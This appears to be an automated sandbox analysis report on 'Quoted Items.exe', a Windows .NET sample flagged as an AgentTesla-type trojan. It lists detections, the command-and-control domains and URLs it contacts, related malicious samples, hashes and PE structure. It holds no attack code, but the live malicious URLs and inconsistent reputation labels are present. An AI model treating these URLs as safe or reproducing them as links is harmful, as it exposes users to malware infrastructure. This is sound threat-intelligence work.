Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Quoted Items.exe	45%	Virustotal		Browse
Quoted Items.exe	49%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
Quoted Items.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.Quoted Items.exe.cb0000.2.unpack	100%	Avira	HEUR/AGEN.1234539	Download File
4.0.Quoted Items.exe.400000.6.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.2.Quoted Items.exe.d44790.3.unpack	100%	Avira	HEUR/AGEN.1234539	Download File
16.2.cmstp.exe.1230000.0.unpack	100%	Avira	HEUR/AGEN.1234539	Download File
4.0.Quoted Items.exe.400000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.2.Quoted Items.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
16.0.cmstp.exe.1230000.0.unpack	100%	Avira	HEUR/AGEN.1234539	Download File
4.0.Quoted Items.exe.400000.8.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
ghs.googlehosted.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.zhouyihong.top/gfge/?-ZEhG=0pO83p&atm=sEHQRf3BqyQO1Td3JS1wynh19DI9TXEUdP6kOjRf7qywa0JEaIf	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.royaltortoisecookieco.online/gfge/?-ZEhG=0pO83p&atm=bkTODcW29ZLLFsJ1z0hFzGOlzA/dTRh9UhQLTYc1zt8rWVzKVHP86zdm8t9X8OCiEKYk	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
https://www.gratitudeaddict.com/	0%	Avira URL Cloud	safe
http://www.gratefulgrandmas.com/gfge/?atm=Z4UEWxzHsbgHCWzNn0OH8uguYAGXLulTgu05WjhJOdFN0vK06536biQ9Uf++w6wnfUsW&-ZEhG=0pO83p	100%	Avira URL Cloud	malware
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
www.gulabmonga.com/gfge/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.zhouyihong.top	180.76.158.103	true	true		unknown
www.quinten-and-sam.com	3.93.205.129	true	false		unknown
www.royaltortoisecookieco.online	209.17.116.163	true	true		unknown
ghs.googlehosted.com	172.217.168.19	true	false	0%, Virustotal, Browse	unknown
www.gratefulgrandmas.com	unknown	unknown	true		unknown
www.ivyleaguereading.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.royaltortoisecookieco.online/gfge/?-ZEhG=0pO83p&atm=bkTODcW29ZLLFsJ1z0hFzGOlzA/dTRh9UhQLTYc1zt8rWVzKVHP86zdm8t9X8OCiEKYk	true	Avira URL Cloud: safe	unknown
http://www.gratefulgrandmas.com/gfge/?atm=Z4UEWxzHsbgHCWzNn0OH8uguYAGXLulTgu05WjhJOdFN0vK06536biQ9Uf++w6wnfUsW&-ZEhG=0pO83p	false	Avira URL Cloud: malware	unknown
www.gulabmonga.com/gfge/	true	Avira URL Cloud: malware	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhouyihong.top/gfge/?-ZEhG=0pO83p&atm=sEHQRf3BqyQO1Td3JS1wynh19DI9TXEUdP6kOjRf7qywa0JEaIf	cmstp.exe, 00000010.00000002.515589194.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.515718507.00000000033FF000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.515691938.00000000033F2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.gratitudeaddict.com/	cmstp.exe, 00000010.00000002.517155525.0000000005762000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
180.76.158.103	www.zhouyihong.top	China	38365	BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd	true
172.217.168.19	ghs.googlehosted.com	United States	15169	GOOGLEUS	false
209.17.116.163	www.royaltortoisecookieco.online	United States	55002	DEFENSE-NETUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	626564
Start date and time: 14/05/202213:10:24	2022-05-14 13:10:24 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Quoted Items.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@6/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 30.6% (good quality ratio 28.4%) Quality average: 72% Quality standard deviation: 31%
HCA Information:	Successful, ratio: 96% Number of executed functions: 73 Number of non-executed functions: 162
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:11:37	API Interceptor	2x Sleep call for process: Quoted Items.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
180.76.158.103	DB_DHL_AWB_001833022AD.exe	Get hash	malicious	Browse	www.zhouyihong.top/gfge/?VDK0L=9rrP-&1b=sEHQRf3BqyQO1Td3JS1wynh19DI9TXEUdP6kOjRf7qywa0JEaIfD5WPsBViY3Gb+1VmV
209.17.116.163	SecuriteInfo.com.Variant.Strictor.270431.23718.exe	Get hash	malicious	Browse	www.alsuwayeh.online/vadq/?mR-DQd=FxEAZBOqz5R0NeiynrtiLVCsuHarxaW1mFy+o20uJ+msc9Qd2MCmx/lTIuXILqX2FDfN&iFQTL=0L3tdR1x
	PI160256.exe	Get hash	malicious	Browse	www.completemarine.care/3e9r/?i0DxMX=lZSlt&4h=bkQEPv2VDMhTkrVzU8ZAptu6TXg9C2QiYGH6dQJxQmwc85UoWQzHX0fFy/CGYl17y0AD
	SecuriteInfo.com.Variant.MSILHeracles.34055.19256.exe	Get hash	malicious	Browse	www.louiselamontagne.com/ahge/?U2MP=Yo8SComLMv4Cuy9hKW9+z2CF+04UD+lalvXKLBo3WDKAQNuIBJGydR75F/HwcIfOYYZQ&n0=-Zt4xVg8yHWXm
	SecuriteInfo.com.Scr.MalPbsgen1.51.exe	Get hash	malicious	Browse	www.criticalthinking.store/xtef/?jZ=z537QeWJ5Eb3oD7eV8SvJ+b/qGEe30lZVgp0RuLxYG752dT2q0iUz5snALf419bmYPWS&z6A86P=IDK07b-p_6zLNp6
	Credit Swift 003453.exe	Get hash	malicious	Browse	www.louiselamontagne.com/onqi/?IH_TKt4=6G29YvYpssukUEV1FcDgUCYQVyAqdysAa8LnXVYv80SoimTtJh5IXxpwUNUsGM6W8Q1Zpy6X0Q==&6l=b8U46TXhpbaTVdkp
	SecuriteInfo.com.Scr.Malcodegdn30.21924.exe	Get hash	malicious	Browse	www.carsla.online/ee3s/?XlIt=5jktFhIX&n67=Q774L3TD8YbEt0WkPLJfhjC0M629cac0L0brDSx1CDOsWRNKHBLYh8bwC/8supC+1/xi
	SOA.exe	Get hash	malicious	Browse	www.completemarine.care/3e9r/?_hshv=bkQEPv2VDMhTkrVzU8ZAptu6TXg9C2QiYGH6dQJxQmwc85UoWQzHX0fFy/CGYl17y0AD&SFQLa=3fs46PgHVhV4ht
	Technical_Specs_and_Scope_for_500MVA_TFM.exe	Get hash	malicious	Browse	www.sethdukes.online/a2c8/?j2Jhu4=9rd4-zgHMHCxT&yF=2M8fiqE0Epyrbn9J212H4Hfy8hyJlUnYS45czzO8hQkcWiAX+kQEItQggeIgSHzSxkVn
	fxjB2RUXfq.exe	Get hash	malicious	Browse	www.arrhythmics.online/gedc/?wTODHvo=iB6uGJxImz5jagK24U3YocKxeKBxBetcHEnybVKkKWmLVKp1ZMS+jfOK+hMYFor80P/w&1bcD=-Z6P
	lacy cpt.exe	Get hash	malicious	Browse	www.karinlaine.online/s68n/?yTEXEX6=evzIu/NXY+fA9E3Ml77XHgbV6UBO+2wEpZlozmBcAXYefjZxSpq4CGPE+YMNufNY4EDnmexSGw==&u6Ap3=lnLHc
	dhl details.pdf.exe	Get hash	malicious	Browse	www.santuariodelplomo.online/uevb/?g0G=l88OxNRZkyL7m1xsq0pAaZlKRCZkjUYfdTA1e8No/Oy9nAdr7b3wK+kx+DanDxgmrDBR&6lwT-h=L2MtcVDXdH
	RFQ-WPS-3602.xlsx	Get hash	malicious	Browse	www.rthearts.com/nk6l/?F2M=aQJ/5obU0Oa2Un3EtNgrcEt00DsX5EewgNz5JOfO7ljBuP/TG6sC4WqVJ9FK0pAWfYSWbQ==&bzrT2=2dItvzx84DcDUju
	Purchase Order TJX VAT No 0175B.exe	Get hash	malicious	Browse	www.osteopathydubai.online/sm3d/?A0G8MT=+w1jjlJnNgu2ravWbzRqS87mbxPIyRzISV6YcOt5PUzR8m569tR3W8YC9GLMUExfAgV2&u0=ihJ4nD
	comprobante de pago SWIFT.exe	Get hash	malicious	Browse	www.chuckmitchel.com/gqvv/?2dxdP=06npxyUNcC1ATXpw1NFVNT6M6Jo549LEhiZKGmRkzOd/cL9RYwJ0WqUsJEx/YZxmjQZ1&7n=7nVDI
	stage4.exe	Get hash	malicious	Browse	www.mccchurch.online/gire/?0h=Uvon50vSToqCujAShyO5U/ime9QGpGlEB/29dLNSemwo9/7hD2RqcntFKIv8lhq/eAlP&v0G8-=1bu4iNz
	zrZYmuDzKucGv6q.exe	Get hash	malicious	Browse	www.hamiltonrealestate.online/wdc8/?G4=7ntdXXkhN&S488ZHd8=DcY6uSHNCGRsl1tp09fc4SCranBrDjgmPZKZETS2kuSInVI6WSgtg4YaRWpUlXZA3d2vmrClVg==
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2f1drv.ms%3a443%2fo%2fs%21BNIvbnTrk45ghQD0LAOG_MZ4-akd%3fe%3dkPOqOOdJYUS4h1c6K2_tZQ%26at%3d9&c=E,1,aO203fz_NBaeG1BbT89JdoQpKsHxugguwdeGS96SJn6vo67JWyWf_-84Ep09x1bSoVTxhmoI7lTe4t8OnmkCtLZemi_JEsHM-XMU1g3ZG9SHTGQPPidzuQ,,&typo=1	Get hash	malicious	Browse	www.billingcochran.com/
	Orden de compra_GRUPO_INFRA.doc	Get hash	malicious	Browse	www.diversifiedes.online/uit2/?f6=8kyo9N9ZsV9ifsZzoK/7UR90KgHQdv/lgh50rmOYADKju7JRtaLqVFQZ5uUOHABkwNjjAA==&q2J=IPIxs40XNlclH4
	copia_rapida.pdf.exe	Get hash	malicious	Browse	www.santuariodelplomo.online/uevb/?oBZ=1bulVXmH&6lAl=l88OxNRZkyL7m1xsq0pAaZlKRCZkjUYfdTA1e8No/Oy9nAdr7b3wK+kx+DanDxgmrDBR
	INVCC.EXE	Get hash	malicious	Browse	www.servants.house/tuu4/?i6z83b=6Hqtyi1b6PZhpnGkehRNvd5I0slO+1fahJdmhO7xIxIoDYOZSjXLtOT+1IlfOdRoBdzR&Wfox=9rBtvh

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.zhouyihong.top	DB_DHL_AWB_001833022AD.exe	Get hash	malicious	Browse	180.76.158.103
www.quinten-and-sam.com	Invoice.exe	Get hash	malicious	Browse	3.234.11.211
www.quinten-and-sam.com	ENQ 6205009033-6000003867.exe	Get hash	malicious	Browse	3.234.11.211

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd	0830#U6388#U6743#Uff08#U6740#U6bd2#U963b#U6b62#U8bf7#U6dfb#U52a0#U4fe1#U4efb#Uff09.exe	Get hash	malicious	Browse	103.235.46.39
	WWVN_INVOICE_8363567453.vbs	Get hash	malicious	Browse	180.76.247.231
	http://despairunanimous.top/Shell-qf/tb.php?yxmwzspg1651993440843	Get hash	malicious	Browse	103.235.46.191
	arm	Get hash	malicious	Browse	180.76.142.179
	qbG0s1MD7I	Get hash	malicious	Browse	182.61.224.144
	http://computercannon.top/russiana-qf/tb.php?qudcxmej1651821025127	Get hash	malicious	Browse	103.235.46.191
	http://104.193.88.123	Get hash	malicious	Browse	104.193.88.123
	http://www.baidu.com/	Get hash	malicious	Browse	103.235.46.234
	SecuriteInfo.com.Variant.MSILHeracles.34055.19256.exe	Get hash	malicious	Browse	180.76.253.2
	DB_DHL_AWB_001833022AD.exe	Get hash	malicious	Browse	180.76.158.103
	http://consideratediscord.top/qatarirway/tb.php?vcavntcl1650710794574	Get hash	malicious	Browse	103.235.46.191
	SecuriteInfo.com.Variant.Fugrafa.163184.15855.exe	Get hash	malicious	Browse	185.10.104.115
	BaiduBrowser.apk	Get hash	malicious	Browse	103.235.46.88
	dxCbO0ahMJ	Get hash	malicious	Browse	106.13.224.235
	jew.arm7	Get hash	malicious	Browse	106.13.224.215
	sora.arm7	Get hash	malicious	Browse	182.61.224.174
	dgAKzFWSQK	Get hash	malicious	Browse	182.61.27.128
	SecuriteInfo.com.Scr.Malcodegdn30.21924.exe	Get hash	malicious	Browse	154.85.49.171
	clock.exe	Get hash	malicious	Browse	103.235.46.39
	PURCHASE.EXE	Get hash	malicious	Browse	180.76.253.2
DEFENSE-NETUS	https://net-solutions-988d5.web.app/#zack.wilber@iwpllc.com	Get hash	malicious	Browse	209.237.135.69
	PI_2992.xlsx	Get hash	malicious	Browse	209.17.116.160
	SecuriteInfo.com.Variant.Strictor.270431.23718.exe	Get hash	malicious	Browse	209.17.116.163
	PI160256.exe	Get hash	malicious	Browse	209.17.116.163
	FDBbttP5S9.exe	Get hash	malicious	Browse	206.188.193.227
	nAk5UEbRLQ.exe	Get hash	malicious	Browse	205.178.189.129
	85nECQIP87.exe	Get hash	malicious	Browse	205.178.146.249
	SecuriteInfo.com.Variant.MSILHeracles.26442.6256.exe	Get hash	malicious	Browse	206.188.193.182
	SecuriteInfo.com.Variant.MSILHeracles.34055.19256.exe	Get hash	malicious	Browse	209.17.116.163
	SWIFT.xlsx	Get hash	malicious	Browse	205.178.144.150
	RFQ - SUPPLY OF PRODUCTS.xlsx	Get hash	malicious	Browse	209.17.116.163
	doc.xls	Get hash	malicious	Browse	205.178.189.129
	PAYMENT - PARADISE FINE FOODS VIETNAM JOINT STOCK COMPANY.exe	Get hash	malicious	Browse	206.188.193.13
	SecuriteInfo.com.Scr.MalPbsgen1.51.exe	Get hash	malicious	Browse	209.17.116.163
	https://pouk7.zenfoliosite.com/	Get hash	malicious	Browse	209.17.116.160
	Credit Swift 003453.exe	Get hash	malicious	Browse	209.17.116.163
	SecuriteInfo.com.Scr.Malcodegdn30.21924.exe	Get hash	malicious	Browse	209.17.116.163
	SOA.exe	Get hash	malicious	Browse	209.17.116.163
	mv tricanhope_020220412.exe	Get hash	malicious	Browse	206.188.193.155
	Technical_Specs_and_Scope_for_500MVA_TFM.exe	Get hash	malicious	Browse	209.17.116.163

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quoted Items.exe.log

Download File

Process:	C:\Users\user\Desktop\Quoted Items.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1308
Entropy (8bit):	5.345811588615766
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5:	2E016B886BDB8389D2DD0867BE55F87B
SHA1:	25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
SHA-256:	1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
SHA-512:	C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.721861373170072
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Quoted Items.exe
File size:	640512
MD5:	901567a408d891fc0f67e15221d1b7e4
SHA1:	dba16ac8c7523f640494843471a5f9d4fb211bef
SHA256:	70c9cf50b937cdf3015d4e7fdffbe1c8ab4820eaca74c7373f0760fa905a494a
SHA512:	8399655a069d6553e93d6e80c3b8c62f4de3a2d6335e2a130f2e6551966c5e490c752521f63533d7c3e8aedf5e38ec6588164c053798174d5928a5078fa475d4
SSDEEP:	12288:F/TbPzuVYafMeY0h5JOH/XVQcUcpNa1AOcCrV1tDOrbdYshB5d:xLFaEX5H/XQt1/h18b2shR
TLSH:	D5D4F07CF5E38E21C3291676C4D368100B714E26E7B3E39F2B4691EA5D02BD74985B8B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}b..............0......@........... ........@.. ....................... ............@................................

File Icon


Icon Hash:	d4a8989ae8ccb6cc

Static PE Info

General

Entrypoint:	0x49a2be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x627DE1F1 [Fri May 13 04:43:29 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9a270	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9c000	0x3c38	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9a21c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x982c4	0x98400	False	0.862261391626	data	7.72747835774	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x9c000	0x3c38	0x3e00	False	0.928553427419	data	7.66198147209	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
